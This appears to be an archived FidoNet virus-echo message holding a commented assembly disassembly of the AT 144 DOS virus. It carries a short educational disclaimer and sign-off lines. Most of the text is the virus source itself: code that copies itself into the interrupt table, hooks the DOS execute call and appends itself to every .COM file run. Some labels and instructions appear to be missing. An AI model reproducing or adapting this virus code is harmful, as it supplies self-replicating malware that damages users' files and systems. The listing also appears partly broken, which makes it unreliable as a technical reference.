mirror of
synced 2024-12-18 17:36:11 +00:00
152 lines
5.2 KiB
152 lines
5.2 KiB
; Msg : 7 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : AT_144.ASM
;.RealName: Max Ivanov
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Doug Bryce, 2:283/718 (06 Nov 94 16:24)
;* To : Mike Salvino
;* Subj : AT_144.ASM
;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org
;This is a disassembly of the AT 144 virus. It is processor specific
;and will only run on AT-class machines (286+). It copies itself
;onto the interrupt table and hooks int 21h, function 4bh. Because
;it is on the interrupt table - to call Int 21h in its infection routine
;it merely calls an INT corresponding to where it stores its
;old handler vectors. In this case - it is Int B4h. One interesting thing
;is the JMP SI instruction at the end to return to the host - this
;works because DOS initially sets SI to 100 for running COM files.
;This virus infects any .COM file executed.
;Please - Do NOT release this or any other virus.
;For educational purposes ONLY! I take no responsibility for damages caused
;by the misuse of this or any other disassembly - they are made to help
;educate programmers as to the workings of the individual viruses and
;viruses as a whole. Such information MUST remain free and uncensored.
;Disassembly by Black Wolf
.model tiny
org 100h
db 0e9h,02,0 ;Jump Virus_Entry
int 21h ;Terminate.
mov di,si
call Get_Displacement
pop si
add si,31h ;SI = storage bytes
movsw ;Restore host in memory.
mov ax,24h ;Set ES:DI to interrupt table
mov es,ax ;DS:SI to beginning of virus
xor di,di
sub si,3Ah
cmp byte ptr es:[di],60h ;Check if installed.
mov cl,90h
rep movsb ;Copy virus into memory
jz Done_Install
mov ds,cx
mov si,84h ;Get Int 21 vector.
mov word ptr [si-4],3Ah ;Hook Int 21
mov [si-2],ax
push cs
pop ds
push cs
pop es
jmp si ;Jumps back to host....
;DOS sets SI = 100h when
;a COM is loaded.
Jump_Byte db 0e9h
mov ax,4c00h
pusha ;Save all Regs.
push ds
xor ah,4Bh ;Check if execute
jnz Exit_Handler
mov ax,3D02h
int 0B4h ;Open the file for read/write
jc Exit_Handler
mov bx,ax
push cs
pop ds
mov ah,3Fh
mov cx,3
mov dx,37h
mov si,dx
int 0B4h ;Read in 3 bytes for storage.
cmp byte ptr [si],4Dh
je Close_File ;Check if it's an EXE
mov ax,4202h
xor cx,cx
xor dx,dx
int 0B4h ;Go to end of file
sub al,3 ;save jump size.
mov bp,ax
mov cl,90h ;If the 2nd and 3rd bytes of
sub ax,cx ;the file correspond to what
cmp ax,[si+1] ;a jump WOULD be if the virus
;were already there, exit.
je Close_File ;(Quit if infected)
mov ah,40h ;Append Virus
int 0B4h
mov ax,4200h
xor cx,cx
int 0B4h ;Go back to the beginning
mov ah,40h
lea dx,[si-1]
mov cl,3
mov [si],bp
int 0B4h ;Write in the jump.
mov ah,3Eh
int 0B4h ;Close file.
pop ds
popa ;Exit Handler
db 0EAh ;Far Jump to old Int 21h.
end start
;-+- Concord/QWK O.O1 Beta-7
; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718)
;Yoo-hooo-oo, -!
; þ The MeÂeO
;/x Include false conditionals in listing
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)